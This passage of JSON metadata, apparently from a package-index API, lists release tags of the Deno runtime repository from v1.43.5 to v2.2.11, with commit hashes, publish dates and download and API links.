releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/d